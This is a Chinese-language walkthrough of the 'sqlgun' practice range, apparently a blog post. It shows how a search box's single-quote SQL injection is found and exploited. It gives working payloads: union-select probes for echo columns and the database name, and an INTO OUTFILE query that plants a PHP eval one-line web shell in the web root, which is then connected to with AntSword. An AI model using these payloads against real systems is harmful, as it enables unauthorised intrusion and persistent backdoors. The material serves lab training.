sqlgun靶场通关攻略

尝试在URL中测试一下sql注入,但是禁止注入

那么在输入框中测试一下xss,存在xss,那么极有可能如果存在sql注入在这里

在测试时,出现了这个搜索框的源代码,可以看出是单引号包含,所以可以测试闭合方式为单引号的sql注入

经测试,确实训在sql注入,闭合方式就是单引号

那么接下来测试回显点,得到2,3两个回显点

复制代码
-1' union select 1,2,3#

爆数据库名,得到数据库名sqlgunnews

复制代码
-1' union select 1,database(),3#

既然存在sql注入,那么我们可以尝试一下写入一句话木马进行测试

但是缺少绝对路径

我们对IP进行目录扫描一下看一下有什么可以用的

发现有一个phpinfo.php文件,访问一下

得到网站根目录/var/www/html

那接下来构造payload,将一句话木马写入根目录

复制代码
-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/zxin.php' #

访问zxin.php文件,我们的一句话木马就在进去了

使用蚁剑谅连接一下,成功连接

在根目录中可以找得到falg文件

相关推荐
卓怡学长3 小时前
w255基于springboot仓库管理系统
java·数据库·spring boot·spring·intellij-idea
J-Tony116 小时前
【Redis】 Redis 是单线程还是多线程
服务器·数据库·mysql
linux kernel6 小时前
02:库与表的操作
mysql
这个DBA有点耶6 小时前
SQL调优进阶:从“优化一条SQL”到“优化一个系统”的思维升级
java·大数据·数据库·sql·程序人生·dba·改行学it
IvorySQL6 小时前
PG 日报|SQL/PGQ 图查询基于联接重写机制实现
数据库·人工智能·sql·postgresql·区块链·ivorysql
数聚天成DeepSData9 小时前
遥感农业数据集下载全攻略
数据库·人工智能·深度学习·机器学习·自然语言处理·数据挖掘
一勺菠萝丶9 小时前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
心静自然凉8009 小时前
MySQL主从同步配置(一主一从)
数据库
haidy ahmed10 小时前
企微复杂审批流反序列化:动态表单解析引擎与EAV存储模型
数据库·人工智能·自动化·企业微信
Lihua奏10 小时前
MVCC:为什么多人同时读写数据,数据库还能不乱
数据库